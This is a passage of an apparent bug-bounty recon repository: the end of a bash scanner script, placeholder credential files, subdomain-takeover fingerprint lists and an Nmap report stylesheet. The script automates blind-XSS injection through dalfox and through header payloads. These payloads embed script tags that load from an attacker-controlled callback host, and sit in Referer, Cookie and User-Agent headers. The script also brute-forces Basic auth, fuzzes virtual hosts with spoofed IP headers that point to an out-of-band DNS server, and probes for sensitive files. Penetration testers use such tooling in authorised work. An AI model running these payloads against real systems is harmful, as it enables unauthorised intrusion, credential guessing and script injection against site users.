COMMON CRAWL Scanning for Archived Endpoints [+]" 402 | if [ ! 
-z $(which gau) ]; then 403 | for u in $(cat ~/recon/$1/$1-alive.txt);do echo $u | gau | grep "$u" >> ~/recon/$1/gau/tmp-$u.txt; done 404 | cat ~/recon/$1/gau/* | sort -u | getching >> ~/recon/$1/gau/$1-gau.txt 405 | rm ~/recon/$1/gau/tmp-* 406 | message "GAU%20Done%20for%20$1" 407 | echo "[+] Done gau for discovering useful endpoints" 408 | else 409 | message "[-]%20Skipping%20GAU%20Scanning%20for%20$1" 410 | echo "[!] Skipping ..." 411 | fi 412 | sleep 5 413 | 414 | echo "[+] DALFOX for injecting blind xss" 415 | if [ ! -z $(which dalfox) ]; then 416 | cat ~/recon/$1/$1-alive.txt | gau | grep "=" | dalfox pipe -b $xss_hunter -o ~/recon/$1/$1-dalfox.txt 417 | message "DALFOX%20Done%20for%20$1" 418 | echo "[+] Done dalfox for injecting blind xss" 419 | else 420 | message "[-]%20Skipping%20DALFOX%20for%20injecting%20blind%20xss%20in%20$1" 421 | echo "[!] Skipping ..." 422 | fi 423 | sleep 5 424 | 425 | echo "[+] KXSS for potentially vulnerable xss" 426 | if [ ! -z $(which kxss) ]; then 427 | cat ~/recon/$1/$1-alive.txt | gau | grep "=" | kxss | grep "is reflected and allows" | awk {'print $9'} | sort -u >> ~/recon/$1/kxss/$1-kxss.txt 428 | message "KXSS%20Done%20for%20$1" 429 | echo "[+] Done kxss for potential xss" 430 | else 431 | message "[-]%20Skipping%20KXSS%20for%20potential%20kxss%20in%20$1" 432 | echo "[!] Skipping ..." 433 | fi 434 | sleep 5 435 | 436 | echo "[+] 401 Scanning" 437 | [ ! -f ~/tools/basic_auth.txt ] && wget https://raw.githubusercontent.com/phspade/Combined-Wordlists/master/basic_auth.txt -O ~/tools/basic_auth.txt 438 | if [ ! 
-z $(which ffuf) ]; then 439 | for i in $(cat ~/recon/$1/$1-httprobe.txt); do 440 | filename=$(echo $i | sed 's/http:\/\///g' | sed 's/https:\/\//ssl-/g') 441 | stat_code=$(curl -s -o /dev/null -w "%{http_code}" "$i" --max-time 10) 442 | if [ 401 == $stat_code ]; then 443 | ffuf -c -w ~/tools/basic_auth.txt -u $i -k -r -H "Authorization: Basic FUZZ" -mc all -fc 500-599,401 -of html -o ~/recon/$1/401/$filename-basic-auth.html 444 | else 445 | echo "$stat_code >> $i" 446 | fi 447 | done 448 | message "401%20Scan%20Done%20for%20$1" 449 | echo "[+] Done 401 Scanning for $1" 450 | else 451 | message "[-]%20Skipping%20ffuf%20for%20401%20scanning" 452 | echo "[!] Skipping ..." 453 | fi 454 | sleep 5 455 | 456 | echo "[+] Scanning for Virtual Hosts Resolution [+]" 457 | if [ ! -z $(which ffuf) ]; then 458 | [ ! -f ~/tools/virtual-host-scanning.txt ] && wget "https://raw.githubusercontent.com/codingo/VHostScan/master/VHostScan/wordlists/virtual-host-scanning.txt" -O ~/tools/virtual-host-scanning.txt 459 | cat ~/recon/$1/$1-open-ports.txt ~/recon/$1/$1-final.txt ~/tools/virtual-host-scanning.txt | sed "s/\%s/$1/g" | sort -u >> ~/recon/$1/$1-temp-vhost-wordlist.txt 460 | for target in $(cat ~/recon/$1/$1-alive.txt); do ffuf -c -w ~/recon/$1/$1-temp-vhost-wordlist.txt -u http://$target -k -r -H "Host: FUZZ" -H "X-Forwarded-For: $target.scanner.xforwarded.$dns_server" -H "X-Real-IP: $target.scanner.xrealip.$dns_server" -H "X-Originating-IP: $target.scanner.xoriginatingip.$dns_server" -H "Client-IP: $target.scanner.clientip.$dns_server" -H "CF-Connecting-IP: $target.scanner.cfconnectingip.$dns_server" -H "Forwarded: for=$target.scanner.for-forwarded.$dns_server;by=$target.scanner.by-forwarded.$dns_server;host=$target.scanner.host-forwarded.$dns_server" -H "X-Client-IP: $target.scanner.xclientip.$dns_server" -H "True-Client-IP: $target.scanner.trueclientip.$dns_server" -H "X-Forwarded-Host: $target.scanner.xforwardedhost.$dns_server" -H "Referer: 
$xss_hunter/$target/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -H "User-Agent: %22%27%3Eblahblah%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2Fscript%3Etesting" -mc all -fc 500-599,400,406,301 -of html -o ~/recon/$1/virtual-hosts/$target.html; done 461 | message "Virtual%20Host%20done%20for%20$1" 462 | echo "[+] Done ffuf for scanning virtual hosts" 463 | else 464 | message "[-]%20Skipping%20ffuf%20for%20vhost%20scanning" 465 | echo "[!] Skipping ..." 466 | fi 467 | rm ~/recon/$1/$1-temp-vhost-wordlist.txt 468 | sleep 5 469 | 470 | echo "[+] Dir and Files Scanning for Sensitive Files [+]" 471 | if [ ! -z $(which ffuf) ]; then 472 | for i in $(cat ~/recon/$1/$1-httprobe.txt); do 473 | filename=$(echo $i | sed 's/http:\/\///g' | sed 's/https:\/\//ssl-/g') 474 | stat_code=$(curl -s -o /dev/null -w "%{http_code}" "$i" --max-time 10) 475 | if [ 404 == $stat_code ]; then 476 | ffuf -c -D -w ~/tools/dicc.txt -ic -t 100 -k -e json,config,yml,yaml,bak,log,zip,php,txt,jsp,html,aspx,asp,axd,config -u $i/FUZZ -mc all -fc 500-599,404,301,400 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "Referer: $xss_hunter/$i/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -of html -o ~/recon/$1/dirsearch/$filename.html 477 | elif [ 403 == $stat_code ]; then 478 | ffuf -c -D -w ~/tools/dicc.txt -ic -t 100 -k -e json,config,yml,yaml,bak,log,zip,php,txt,jsp,html,aspx,asp,axd,config -u $i/FUZZ -mc all -fc 500-599,403,301,400 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "Referer: 
$xss_hunter/$i/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -of html -o ~/recon/$1/dirsearch/$filename.html 479 | elif [ 401 == $stat_code ]; then 480 | ffuf -c -D -w ~/tools/dicc.txt -ic -t 100 -k -e json,config,yml,yaml,bak,log,zip,php,txt,jsp,html,aspx,asp,axd,config -u $i/FUZZ -mc all -fc 500-599,401,301,400 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "Referer: $xss_hunter/$i/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -of html -o ~/recon/$1/dirsearch/$filename.html 481 | elif [ 200 == $stat_code ]; then 482 | ffuf -c -D -w ~/tools/dicc.txt -ic -t 100 -k -e json,config,yml,yaml,bak,log,zip,php,txt,jsp,html,aspx,asp,axd,config -u $i/FUZZ -mc all -fc 500-599,404,301,400 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "Referer: $xss_hunter/$i/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -of html -o ~/recon/$1/dirsearch/$filename.html 483 | else 484 | echo "$i >> $stat_code" 485 | fi 486 | done 487 | message "Dir%20and%20files%20Scan%20Done%20for%20$1" 488 | echo "[+] Done ffuf for file and directory scanning" 489 | else 490 | message "[-]%20Skipping%20ffuf%20for%20dir%20and%20files%20scanning" 491 | echo "[!] Skipping ..." 492 | fi 493 | sleep 5 494 | 495 | [ ! 
-f ~/$1.out ] || mv ~/$1.out ~/recon/$1/ 496 | message "Scanner%20Done%20for%20$1" 497 | date 498 | echo "[+] Done scanner :)" 499 | -------------------------------------------------------------------------------- /tools/.creds: -------------------------------------------------------------------------------- 1 | password = password123 ## change me, of course 2 | telegram_bot = mytelegrambot ## change me, of course 3 | telegram_id = 123456 4 | dns_server = myserver.xyz 5 | xss_hunter = https://yourown.xss.ht/ -------------------------------------------------------------------------------- /tools/.tokens: -------------------------------------------------------------------------------- 1 | github_token_here -------------------------------------------------------------------------------- /tools/fingerprints.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "service": "fastly", 4 | "cname": [ 5 | "fastly" 6 | ], 7 | "fingerprint": [ 8 | "Fastly error: unknown domain" 9 | ], 10 | "nxdomain": false 11 | }, 12 | { 13 | "service": "github", 14 | "cname": [ 15 | "github.io" 16 | ], 17 | "fingerprint": [ 18 | "There isn't a GitHub Pages site here." 19 | ], 20 | "nxdomain": false 21 | }, 22 | { 23 | "service": "heroku", 24 | "cname": [ 25 | "herokuapp" 26 | ], 27 | "fingerprint": [ 28 | "herokucdn.com/error-pages/no-such-app.html" 29 | ], 30 | "nxdomain": false 31 | }, 32 | { 33 | "service": "pantheon", 34 | "cname": [ 35 | "pantheonsite.io" 36 | ], 37 | "fingerprint": [ 38 | "The gods are wise, but do not know of the site which you seek." 39 | ], 40 | "nxdomain": false 41 | }, 42 | { 43 | "service": "tumblr", 44 | "cname": [ 45 | "domains.tumblr.com" 46 | ], 47 | "fingerprint": [ 48 | "Whatever you were looking for doesn't currently exist at this address."
49 | ], 50 | "nxdomain": false 51 | }, 52 | { 53 | "service": "wordpress", 54 | "cname": [ 55 | "wordpress.com" 56 | ], 57 | "fingerprint": [ 58 | "Do you want to register" 59 | ], 60 | "nxdomain": false 61 | }, 62 | { 63 | "service": "teamwork", 64 | "cname": [ 65 | "teamwork.com" 66 | ], 67 | "fingerprint": [ 68 | "Oops - We didn't find your site." 69 | ], 70 | "nxdomain": false 71 | }, 72 | { 73 | "service": "helpjuice", 74 | "cname": [ 75 | "helpjuice.com" 76 | ], 77 | "fingerprint": [ 78 | "We could not find what you're looking for." 79 | ], 80 | "nxdomain": false 81 | }, 82 | { 83 | "service": "helpscout", 84 | "cname": [ 85 | "helpscoutdocs.com" 86 | ], 87 | "fingerprint": [ 88 | "No settings were found for this company:" 89 | ], 90 | "nxdomain": false 91 | }, 92 | { 93 | "service": "s3 bucket", 94 | "cname": [ 95 | "amazonaws" 96 | ], 97 | "fingerprint": [ 98 | "The specified bucket does not exist" 99 | ], 100 | "nxdomain": false 101 | }, 102 | { 103 | "service": "ghost", 104 | "cname": [ 105 | "ghost.io" 106 | ], 107 | "fingerprint": [ 108 | "The thing you were looking for is no longer here, or never was" 109 | ], 110 | "nxdomain": false 111 | }, 112 | { 113 | "service": "feedpress", 114 | "cname": [ 115 | "redirect.feedpress.me" 116 | ], 117 | "fingerprint": [ 118 | "The feed has not been found." 119 | ], 120 | "nxdomain": false 121 | }, 122 | { 123 | "service": "shopify", 124 | "cname": [ 125 | "myshopify.com" 126 | ], 127 | "fingerprint": [ 128 | "Sorry, this shop is currently unavailable." 129 | ], 130 | "nxdomain": false 131 | }, 132 | { 133 | "service": "statuspage", 134 | "cname": [ 135 | "statuspage.io" 136 | ], 137 | "fingerprint": [ 138 | "You are being redirected" 139 | ], 140 | "nxdomain": false 141 | }, 142 | { 143 | "service": "uservoice", 144 | "cname": [ 145 | "uservoice.com" 146 | ], 147 | "fingerprint": [ 148 | "This UserVoice subdomain is currently available!" 
149 | ], 150 | "nxdomain": false 151 | }, 152 | { 153 | "service": "surge", 154 | "cname": [ 155 | "surge.sh" 156 | ], 157 | "fingerprint": [ 158 | "project not found" 159 | ], 160 | "nxdomain": false 161 | }, 162 | { 163 | "service": "bitbucket", 164 | "cname": [ 165 | "bitbucket.io" 166 | ], 167 | "fingerprint": [ 168 | "Repository not found" 169 | ], 170 | "nxdomain": false 171 | }, 172 | { 173 | "service": "intercom", 174 | "cname": [ 175 | "custom.intercom.help" 176 | ], 177 | "fingerprint": [ 178 | "This page is reserved for artistic dogs.", 179 | "
" 180 | ], 181 | "nxdomain": false 182 | }, 183 | { 184 | "service": "webflow", 185 | "cname": [ 186 | "proxy.webflow.com", 187 | "proxy-ssl.webflow.com" 188 | ], 189 | "fingerprint": [ 190 | "

The page you are looking for doesn't exist or has been moved.

" 191 | ], 192 | "nxdomain": false 193 | }, 194 | { 195 | "service": "wishpond", 196 | "cname": [ 197 | "wishpond.com" 198 | ], 199 | "fingerprint": [ 200 | "https://www.wishpond.com/404?campaign=true" 201 | ], 202 | "nxdomain": false 203 | }, 204 | { 205 | "service": "aftership", 206 | "cname": [ 207 | "aftership.com" 208 | ], 209 | "fingerprint": [ 210 | "Oops.

The page you're looking for doesn't exist." 211 | ], 212 | "nxdomain": false 213 | }, 214 | { 215 | "service": "aha", 216 | "cname": [ 217 | "ideas.aha.io" 218 | ], 219 | "fingerprint": [ 220 | "There is no portal here ... sending you back to Aha!" 221 | ], 222 | "nxdomain": false 223 | }, 224 | { 225 | "service": "tictail", 226 | "cname": [ 227 | "domains.tictail.com" 228 | ], 229 | "fingerprint": [ 230 | "to target URL: Error Code: 404

" 244 | ], 245 | "nxdomain": false 246 | }, 247 | { 248 | "service": "bigcartel", 249 | "cname": [ 250 | "bigcartel.com" 251 | ], 252 | "fingerprint": [ 253 | "

Oops! We could’t find that page.

" 254 | ], 255 | "nxdomain": false 256 | }, 257 | { 258 | "service": "campaignmonitor", 259 | "cname": [ 260 | "createsend.com" 261 | ], 262 | "fingerprint": [ 263 | "Double check the URL or
-------------------------------------------------------------------------------- /tools/nmap-bootstrap.xsl: -------------------------------------------------------------------------------- [XSLT markup stripped during extraction. The file is a Bootstrap-styled XSL stylesheet that renders Nmap XML output as an HTML "Scan Report - Nmap <version>" page: a summary of hosts scanned/up/down with progress bars, a "Scanned Hosts (offline hosts are hidden)" table (State, Address, Hostname, TCP open, UDP open), per-host "Online Hosts" sections listing Hostnames and a Ports table (Port, Protocol, State, Reason, Service, Product, Version, Extra Info) with CVE lookup links to nvd.nist.gov, Host Script output, and an "Open Services" summary table (Address, Port, Protocol, Service, Product, Version, CPE, Extra info).]
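The stylesheet is meant to be applied to Nmap's XML output. A hypothetical wrapper (an assumption for illustration, not part of scanner.sh), assuming `xsltproc` is installed and the stylesheet sits at `~/tools/nmap-bootstrap.xsl` as in this repo's tree:

```shell
# Hypothetical helper: render an Nmap XML scan as the Bootstrap HTML report.
# Assumes xsltproc is installed and the stylesheet path matches this repo's layout.
render_report() {
  local xml=$1 html=$2
  xsltproc -o "$html" ~/tools/nmap-bootstrap.xsl "$xml"
}
# usage: render_report scan.xml scan.html
```

Alternatively, `nmap -sV -oX scan.xml --stylesheet nmap-bootstrap.xsl <target>` embeds the stylesheet reference in the XML so a browser renders the report directly.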
-------------------------------------------------------------------------------- /tools/providers-data.csv: -------------------------------------------------------------------------------- 1 | name,cname,string,http 2 | github,github,There isn't a GitHub Pages site here.,false 3 | github,github,For root URLs (like http://example.com/) you must provide an index.html file,false 4 | heroku,heroku,There's nothing here,true 5 | heroku,heroku,No such app,true 6 | tumblr,tumblr.com,There's nothing here.,true 7 | tumblr,tumblr.com,Whatever you were looking for doesn't currently exist at this address,true 8 | shopify,myshopify.com,Only one step left!,false 9 | shopify,myshopify.com,"Sorry, this shop is currently unavailable.",false 10 | instapage,pageserve.co,You've Discovered A Missing Link. Our Apologies!,false 11 | tictail,tictail.com,Building a brand of your own?,true 12 | campaignmonitor,createsend.com,Trying to access your account?,false 13 | cargocollective,cargocollective.com,404 Not Found,false 14 | amazonaws,amazonaws.com,NoSuchBucket,false 15 | amazonaws,amazonaws.com,The specified bucket does not exist,false 16 | smartling,smartling.com,Domain is not configured,false 17 | acquia,acquia.com,If you are an Acquia Cloud customer and expect to see your site at this address,false 18 | fastly,fastly.net,Please check that this domain has been added to a service,false 19 | fastly,fastly.net,Fastly error: unknown domain:,false 20 | pantheon,pantheonsite.io,The gods are wise,false 21 | uservoice,uservoice.com,This UserVoice subdomain is currently available!,false 22 | ghost,ghost.io,The thing you were looking for is no longer here,false 23 | pingdom,stats.pingdom.com,pingdom,false 24 | feedpress,redirect.feedpress.me,The feed has not been found,false 25 | helpjuice,helpjuice.com,We could not find what you're looking for.,false 26 | surge,surge.sh,project not found,false 27 |
surveygizmo-eu,privatedomain.surveygizmo.eu,data-html-name,false 28 | teamwork,teamwork.com,Oops - We didn't find your site.,false 29 | wordpress,wordpress,Domain mapping upgrade for this domain not found,false 30 | wordpress,wordpress,Do you want to register *.wordpress.com?,false 31 | bitbucket,bitbucket.io,Repository not found,true 32 | helpscout,helpscoutdocs.com,No settings were found for this company:,false 33 | jetbrains,myjetbrains.com,is not a registered InCloud YouTrack,false 34 | azure,azurewebsites.net,404 Web Site not found,false 35 | readme,readme.io,"Project doesnt exist... yet!",false 36 | kinsta,kinsta.com,No Site For Domain,false 37 | intercom,intercom.io,Uh oh. That page doesn't exist.,false 38 | launchrock,launchrock.com,It looks like you may have taken a wrong turn somewhere,false 39 | pantheon,pantheon.io,404 error unknown site,false 40 | strikingly,strikinglydns.com,page not found,false 41 | uptimerobot,uptimerobot.com,page not found,false 42 | fly,fly.io,404 Not Found,false 43 | --------------------------------------------------------------------------------
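providers-data.csv drives the subdomain-takeover checks (it is the data format consumed by tko-subs): each row pairs a provider name and CNAME substring with a page fingerprint. A minimal sketch of the matching step in bash — the `/tmp` paths and sample rows are illustrative, and the naive `cut`-based parsing assumes fingerprint strings without embedded commas (quoted rows like the Shopify entry would need a real CSV parser):

```shell
#!/usr/bin/env bash
# Sketch: grep a fetched HTTP body against providers-data.csv fingerprints.
# Prints the provider name for every fingerprint found in the body.
match_body() {
  local body_file=$1 csv_file=$2
  tail -n +2 "$csv_file" | while IFS= read -r row; do   # skip the CSV header
    name=${row%%,*}                                     # first field: provider name
    fp=$(printf '%s' "$row" | cut -d',' -f3)            # third field: fingerprint string
    grep -qF -- "$fp" "$body_file" && printf '%s\n' "$name"
  done
}

# illustrative sample data (a real run would curl each CNAME-matched host)
cat > /tmp/body.txt <<'EOF'
<html><body>There isn't a GitHub Pages site here.</body></html>
EOF
cat > /tmp/providers.csv <<'EOF'
name,cname,string,http
github,github,There isn't a GitHub Pages site here.,false
heroku,heroku,No such app,true
EOF

match_body /tmp/body.txt /tmp/providers.csv   # prints: github
```

In scanner.sh's flow this matching is done by tko-subs and subjack themselves; the sketch only shows why the `string` column exists.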